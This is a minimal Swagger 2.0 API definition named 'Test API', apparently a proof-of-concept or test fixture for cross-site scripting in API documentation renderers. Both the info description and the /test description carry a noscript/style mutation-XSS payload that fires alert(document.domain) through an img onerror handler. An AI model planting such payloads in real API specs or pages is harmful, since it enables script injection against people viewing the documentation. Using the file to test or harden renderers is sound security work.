swagger: "2.0"
info:
  title: Test API
  description: <noscript><style></noscript><img src=x onerror=alert(document.domain)>
  version: "1.0"
paths:
  /test:
    get:
      summary: Test
      description: <noscript><style></noscript><img src=x onerror=alert(document.domain)>
      responses:
        "200":
          description: OK
